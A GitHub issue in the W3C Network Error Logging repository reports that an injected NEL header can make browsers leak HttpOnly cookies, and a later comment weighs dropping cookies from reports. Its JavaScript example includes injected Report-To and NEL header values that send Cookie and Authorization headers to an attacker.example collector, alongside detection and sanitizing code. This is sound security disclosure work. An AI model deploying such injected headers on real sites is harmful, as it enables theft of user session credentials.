w3c / network-error-logging

Network Error Logging
https://w3c.github.io/network-error-logging/

NEL header injection attack allows stealing HttpOnly cookies #112

Open chlily1 opened 5 years ago

chlily1 commented 5 years ago

If an attacker is able to inject a NEL header that requests that Cookie headers be sent in the request_headers report field, then any HttpOnly cookies could also be stolen, which would not be possible with a regular header injection attack.
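The mechanism behind this report, as an added illustration in JavaScript that is not code from the NEL specification, the w3c repository or any browser: an attacker-controlled Report-To/NEL header pair is injected on the victim origin, and because the NEL policy's request_headers allow-list decides which request headers the browser copies into the report body, the HttpOnly session cookie that page script cannot read ends up in a report posted to the attacker's collector. The header values, the collector URL and the sample request are constructed for this example; the hardened variant simply drops credential-bearing header names from the allow-list, which is one of the mitigations this issue is weighing.

```javascript
// Added example modelling the NEL request_headers allow-list. It is not the spec's
// or any browser's code; header values and hostnames below are constructed.

// Constructed attacker-injected response headers on the victim origin.
const INJECTED_REPORT_TO =
  '{"group":"exfil","max_age":86400,' +
  '"endpoints":[{"url":"https://collector.attacker.example/reports"}]}';
const INJECTED_NEL =
  '{"report_to":"exfil","max_age":86400,"success_fraction":1.0,"failure_fraction":1.0,' +
  '"request_headers":["Cookie","Authorization"]}';

// Constructed request the browser later sends to the same origin. The browser attaches
// the HttpOnly cookie itself; page script cannot read it via document.cookie.
const SAMPLE_REQUEST_HEADERS = {
  Host: 'victim.example',
  Cookie: 'session=0123456789abcdef; theme=dark',
  Authorization: 'Bearer example-token',
  'User-Agent': 'ExampleBrowser/1.0',
};

// Header names that carry credentials and should never be echoed into a report.
const SENSITIVE_REQUEST_HEADERS = new Set(['cookie', 'authorization', 'proxy-authorization']);

// Minimal NEL policy parser: a JSON object with a string report_to, a non-negative
// integer max_age and optional request_headers / response_headers string arrays.
function parseNelPolicy(headerValue) {
  let obj;
  try { obj = JSON.parse(headerValue); } catch { return null; }
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) return null;
  if (typeof obj.report_to !== 'string') return null;
  if (!Number.isInteger(obj.max_age) || obj.max_age < 0) return null;
  const names = (v) => (Array.isArray(v) && v.every((h) => typeof h === 'string') ? v : []);
  return {
    report_to: obj.report_to,
    max_age: obj.max_age,
    success_fraction: typeof obj.success_fraction === 'number' ? obj.success_fraction : 0.0,
    failure_fraction: typeof obj.failure_fraction === 'number' ? obj.failure_fraction : 1.0,
    request_headers: names(obj.request_headers),
    response_headers: names(obj.response_headers),
  };
}

// Resolves the endpoint URLs of the Report-To group a NEL policy points at, i.e. where
// the report (and anything copied into it) will be delivered.
function collectorEndpoints(reportToValue, group) {
  let obj;
  try { obj = JSON.parse(reportToValue); } catch { return []; }
  if (obj === null || typeof obj !== 'object' || obj.group !== group) return [];
  if (!Array.isArray(obj.endpoints)) return [];
  return obj.endpoints.filter((e) => e && typeof e.url === 'string').map((e) => e.url);
}

// Detection: does the policy ask for credential-bearing request headers?
function policyRequestsSensitiveHeaders(policy) {
  return policy.request_headers.some((h) => SENSITIVE_REQUEST_HEADERS.has(h.toLowerCase()));
}

// Hardened variant: keep the policy but strip sensitive names from the allow-list.
function sanitizePolicy(policy) {
  return {
    ...policy,
    request_headers: policy.request_headers.filter(
      (h) => !SENSITIVE_REQUEST_HEADERS.has(h.toLowerCase()),
    ),
  };
}

// Models the request_headers member of a NEL report body: only header names listed in
// the policy are copied (name match is case-insensitive), each as a list of values.
function buildReportRequestHeaders(policy, requestHeaders) {
  const wanted = new Map(policy.request_headers.map((h) => [h.toLowerCase(), h]));
  const out = {};
  for (const [name, value] of Object.entries(requestHeaders)) {
    const key = wanted.get(name.toLowerCase());
    if (key !== undefined) out[key] = [value];
  }
  return out;
}

// Runs the injected policy against the sample request, once as-is and once sanitized.
function demo() {
  const policy = parseNelPolicy(INJECTED_NEL);
  const endpoints = collectorEndpoints(INJECTED_REPORT_TO, policy.report_to);
  const leaked = buildReportRequestHeaders(policy, SAMPLE_REQUEST_HEADERS);
  const safe = buildReportRequestHeaders(sanitizePolicy(policy), SAMPLE_REQUEST_HEADERS);
  return { policy, endpoints, leaked, safe };
}

console.log(JSON.stringify(demo(), null, 2));
```

With success_fraction set to 1.0 the attacker does not even need to cause a network error: every successful request to the origin produces a report, and each report carries the full Cookie value, HttpOnly or not. The sanitizePolicy step shows the narrower fix (refuse Cookie and Authorization in the allow-list); the broader option discussed below is to never put cookies in reports at all.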

clelland commented 1 year ago

Discussed at TPAC, and the sentiment in the room was that we perhaps should simply not send cookies in reports.